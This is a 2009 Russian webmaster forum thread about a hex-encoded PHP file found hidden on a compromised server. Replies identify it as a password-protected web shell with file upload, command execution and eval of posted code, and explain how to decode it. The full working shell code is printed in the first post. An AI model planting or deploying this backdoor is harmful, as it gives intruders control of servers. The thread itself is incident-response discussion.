С нами с 13.05.08
Сообщения: 23
Рейтинг: 16
|
Добавлено: 07/08/09 в 18:17 |
Несколько раз у меня на некоторых доменах появлялись разного рода эксплоиты.
Мы их чистили но откуда они появляются понять не могли, вот обнаружили пхп фалы, которые маскировались используя имена папок
на сервере а также стандартные имена, выкладываю зашифрованный пхп код,
может кому пригодится в решении аналогичной проблемы.
Если кто растолкует как это работало и т.д., тому спасибо.
Код: | <?php $s="696620287374726C656E28245F504F53545B6363635D293D3D30297B69662028245F50
4F53545B706173735D213D2731323327297B6563686F20273C68746D6C3E3C626F64792062
67636F6C6F723D23424246464242206F6E6C6F61643D22646F63756D656E742E6D79662E70
6173732E666F63757328293B223E3C666F726D206D6574686F643D504F53543E3C696E7075
74206E616D653D706173733E3C2F666F726D3E3C2F626F64793E3C2F68746D6C3E273B6578
697428293B7D6563686F20273C68746D6C3E3C626F6479206267636F6C6F723D2342424646
4242206F6E6C6F61643D22646F63756D656E742E6D79662E63632E666F63757328293B223E
273B6563686F20273C666F726D206E616D653D6D7966206D6574686F643D504F535420656E
63747970653D226D756C7469706172742F666F726D2D64617461223E3C696E707574207479
70653D68696464656E206E616D653D706173732076616C75653D272E245F504F53545B7061
73735D2E273E3C696E70757420747970653D66696C65206E616D653D757066696C653E3C69
6E707574206E616D653D6E65776E616D653E3C696E70757420747970653D7375626D69743E
3C62723E273B6563686F20273C696E707574206E616D653D63632073697A653D3733207661
6C75653D22272E7374726970736C617368657328245F504F53545B63635D292E27223E3C2F
666F726D3E273B6563686F20273C7072653E273B20696620286D6F76655F75706C6F616465
645F66696C6528245F46494C45535B27757066696C65275D5B27746D705F6E616D65275D2C
20245F504F53545B6E65776E616D655D2929207B202F2A6563686F202253656E742E3C6272
3E5C6E223B2A2F207D69662028245F504F53545B6D66696C655D29207B2020202466703D66
6F70656E28245F504F53545B6E65776E616D655D2C277727293B202020666F7228246B3D30
3B20246B3C7374726C656E28245F504F53545B6D66696C655D293B20246B2B3D322920207B
20202020246363203D2073756273747228245F504F53545B6D66696C655D2C246B2C32293B
20202020246363203D20273078272E2463633B2020202020202020246363203D20726F756E
6428246363293B20202020246363203D2063687228246363293B2020202066777269746528
2466702C246363293B2020207D202066636C6F736528246670293B207D24636F3D73747269
70736C617368657328245F504F53545B63635D293B206563686F206024636F603B20656368
6F20273C2F7072653E273B6563686F20273C2F626F64793E3C2F68746D6C3E273B7D20656C
7365207B6966286765745F6D616769635F71756F7465735F6770632829297B6576616C2873
74726970736C617368657328245F504F53545B6363635D29293B7D20656C7365207B657661
6C28245F504F53545B6363635D293B7D7D";$sss="";for($k=0;$k<strlen($s);$k+=2){$ss=chr(("0x".substr($s,$k,2))+0);$sss.=$ss;}eval($sss);$ssss="**********
**************************************************************************
********************************";?> |
|
|
|
|
« ... full on ... »
С нами с 17.03.07
Сообщения: 670
Рейтинг: 1686
|
Добавлено: 07/08/09 в 18:50 |
То что зашифровано в этом коде - это обычный php-shell с аплоадом файлов и возможностью выполнять php-код из этого скрипта. Т.е. это лишь средство накосячить на сервере.
А попасть на сервер он мог, например, через формы загрузки файлов.
Кто залил и зачем - это уже нужно смотреть что делают установленные через этот шелл эксплоиты или пр. вредоносные скрипты/программы.
|
|
Power of the lime madness...
|
0
|
|
|
Криптопохуист
С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019
|
Добавлено: 07/08/09 в 19:43 |
Ищи руткит на сервере. А чтобы расшифровать, достаточно просто eval($sss); заменить на echo $sss; и запустить скрипт.
|
|
|
|
С нами с 08.02.03
Сообщения: 10564
Рейтинг: 5962
|
Добавлено: 07/08/09 в 20:41 |
at3 стоит на машине?
|
|
|
|
Мотиватор :)
С нами с 06.05.09
Сообщения: 3028
Рейтинг: 607
|
Добавлено: 07/08/09 в 20:42 |
приведенный ТС код аплоадит файлы на сервер через форму и позволяет выполнять произвольный код
|
|
|
|
Текстовая реклама в форме ответа Заголовок и до четырех строчек текста Длина текста до 350 символов Купить рекламу в этом месте! |